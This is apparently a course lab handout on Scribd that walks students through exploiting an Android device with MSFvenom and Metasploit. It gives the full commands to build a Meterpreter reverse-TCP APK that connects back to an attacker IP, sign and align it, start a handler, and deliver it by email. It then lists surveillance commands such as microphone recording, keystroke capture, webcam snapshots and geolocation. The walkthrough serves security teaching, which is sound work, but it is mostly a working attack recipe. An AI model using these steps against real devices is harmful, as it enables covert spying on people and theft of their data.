Scribd
Upload
313 views

Final Project-Exploiting An Android Device

This document discusses exploiting an Android device using MSFvenom and Metasploit Framework. It involves 6 steps: 1. Set up Kali Linux and Android emulator VMs. 2. Use MSFvenom to generate a malicious APK file targeting the Android device. 3. Sign the APK file's certificate using keytool and jarsigner to allow installation. 4. Start a Metasploit listener to receive the payload. 5. Send the signed APK to the Android device and install it. 6. Use Meterpreter commands like sysinfo and screenshot on the compromised device.

Uploaded by

Kim Chan
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
313 views

Final Project-Exploiting An Android Device

This document discusses exploiting an Android device using MSFvenom and Metasploit Framework. It involves 6 steps: 1. Set up Kali Linux and Android emulator VMs. 2. Use MSFvenom to generate a malicious APK file targeting the Android device. 3. Sign the APK file's certificate using keytool and jarsigner to allow installation. 4. Start a Metasploit listener to receive the payload. 5. Send the signed APK to the Android device and install it. 6. Use Meterpreter commands like sysinfo and screenshot on the compromised device.

Uploaded by

Kim Chan
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 7

Disclaimer

Please note that any material or activity related to cybersecurity or hacking provided here is intended solely for educational purposes. The purpose of this material is to
increase awareness and understanding of cybersecurity concepts and principles. The activities described in this material should not be attempted outside of a
controlled educational setting. Any attempt to engage in illegal or unethical activities related to cybersecurity could result in serious legal and ethical consequences. It
is the responsibility of individuals to use this information in a responsible and ethical manner.

Exploiting an Android Device Using MSFvenom and Metasploit Framework

Objective: You will learn how to use MSFvenom and the Metasploit framework to exploit an Android mobile
device. You will build the payload using MSFvenom, save it as an .apk file, and add a listener to the Metasploit
system.

1. Create two VMs in VMware workstation, Kali Linux and Android emulator (LineageOS 14.1 R5)
Note: instead of using the android emulator you can use your personal device if you wish

2. Creating a malicious APK (Android Package Kit file format):

In Kali, open the terminal and execute the following command to generate the malicious APK:

sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.230.132 LPORT=4444 R


> android.apk

Note: Replace <your-ip-address> with Kali IP address.


An APK file (Android Package Kit file format) is the file format for applications used on the Android

msfvenom: Metasploit Framework tool for generating payloads.


-p android/meterpreter/reverse_tcp: Specifies Android Meterpreter reverse TCP payload.
LHOST=<your-ip-address>: Sets the attacker's IP address for the connection.
LPORT=4444: Sets the port for the connection.
R: Specifies raw output format.
> android.apk: Redirects the output to an APK file named "android.apk".

Creating a malicious APK


Use this command to create an
apk file:
sudo msfvenom -p
android/meterpreter/reverse_tc
p LHOST=192.168.230.132
LPORT=4444 R > android.apk
Use this command to verify
the file was created.
ls -la

3. Signing the Certificate

Generate a Keystore for the android.apk file:


sudo keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize
2048 -validity 10000

keytool: Java tool for managing cryptographic keys and certificates.


-genkey: Generates a new key pair and certificate.
-V: Enables verbose output for more detailed information.
-keystore key.keystore: Specifies the filename of the keystore file to be created (key.keystore).
-alias hacked: Sets an alias (identifier) for the key entry in the keystore (hacked).
-keyalg RSA: Specifies the algorithm to generate the key pair (RSA).
-keysize 2048: Sets the size of the key (2048 bits).
-validity 10000: Sets the validity period of the key pair in days (10000 days).

Install Jarsigner tool:


sudo apt-get install openjdk-11-jdk-headless

Jarsigner is a command-line tool used to digitally sign Java Archive (JAR) files, including APK files in the case of Android
applications. Signing the APK file is crucial as it ensures the integrity and authenticity of the application. Android devices
require properly signed certificates for app installation, and only signed APK files can be installed

Sign the APK file using Jarsigner:


sudo jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore
android.apk hacked

Verify if the application is signed:


sudo jarsigner -verify -verbose -certs android.apk

Install Zipalign tool:


sudo apt-get install zipalign
Zipalign is a tool used to optimize the alignment of resources in APK files. It ensures that all uncompressed data starts with a
particular alignment relative to the start of the file. This optimization process improves the performance of the APK on Android
devices by reducing memory usage.

Convert the .apk file with zipalign:


sudo zipalign -v 4 android.apk singed_jar.apk

zipalign: Android tool for optimizing APK files.


-v: Enables verbose output for more detailed information.
4: Specifies the alignment requirement (4-byte alignment).
android.apk: Specifies the input APK file to be aligned.
singed_jar.apk: Specifies the output aligned APK file.

Signing the Certificate


Generate a Keystore for
the android.apk file:
sudo keytool -genkey -V
-keystore key.keystore -
alias hacked -keyalg
RSA -keysize 2048 -
validity 10000

Install Jarsigner tool:


sudo apt-get install
openjdk-11-jdk-headless

note: “download will


take forever”

Sign the APK file using


Jarsigner:
sudo jarsigner -verbose -
sigalg SHA1withRSA -
digestalg SHA1 -
keystore key.keystore
android.apk hacked
Verify if the application
is signed:
sudo jarsigner -verify -
verbose -certs
android.apk

Install Zipalign tool:


sudo apt-get install
zipalign

Edit sources.list files by


using nano and this
code
deb
http://ftp.de.debian.org/d
ebian buster main
Update the kali linux

Convert the .apk file


with zipalign:
sudo zipalign -v 4
android.apk
singed_jar.apk

4. Setting up listener on Metasploit

Open Metasploit console:


sudo msfconsole
Load multi-handler exploit:
use exploit/multi/handler
Set up the reverse payload:
set payload android/meterpreter/reverse_tcp
Set LHOST and LPORT:
set LHOST 192.168.230.132
set LPORT 4444
Start the listener:
Run
Setting up listener on Metasploit
Open Metasploit console:
sudo msfconsole

Load multi-handler exploit:


use exploit/multi/handler

Set up the reverse payload:


set payload
android/meterpreter/reverse_tc
p
Set LHOST and LPORT:
set LHOST 192.168.230.132
set LPORT 4444

Start the listener:


Run

5. Send the malicious APK to the target machine

Send the file 'singed_jar.apk' to the victim’s email (yourself in this project).

The victim will download the singed_jar.apk file and install it with 'Unknown sources' allowed on the
Android device. Then, run and install the .apk file. After complete installation, we will return to the Kali
machine and start the Meterpreter session.
6. Post-Exploitation Commands

Once a Meterpreter session is acquired on the Android device, execute only 10 commands from the following
for further exploration:

o sysinfo: Display system information.


o check_root: Check if the device is rooted.
o record_mic: Record sounds on the victim's end.
o dump_calllog: Save the list of contacts in a text file (Note: Since the system is new, there may
be no contacts initially).
o getuid: Get the user ID of the current user.
o shell: Gain a command shell on the device.
o download: Download a file from the target device to the attacker's machine.
o upload: Upload a file from the attacker's machine to the target device.
o screenshot: Take a screenshot of the target device's screen.
o webcam_list: List available webcams on the target device (if applicable).
o webcam_snap: Take a snapshot from the target device's webcam (if applicable).
o geolocate: Attempt to retrieve the geographical location of the target device.
o keyscan_start: Start capturing keystrokes entered on the target device's keyboard.
o keyscan_dump: Dump captured keystrokes.

Marking schema

Task Mark
Task 1 2
Task 2 3
Task 3 5
Task 4 5
Task 5 5
Task 6 10
Student engagement* Excellent: 5 points
Good: 2 points
Poor: 0
Total 40

*Student engagement includes:

 Active Participation: Is the student actively engaged in discussions, asking questions, and providing answers or contributions?
 Frequency: How often does the student participate? Are they consistently engaged throughout the session?
 Quality of Contributions: Are the student's contributions thoughtful, relevant, and constructive?
 Engagement with Peers: Does the student interact with their classmates, providing feedback, encouragement, or assistance when needed?

Links

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-
framework-9e90af4a4d7b
https://www.osboxes.org/android-x86/

You might also like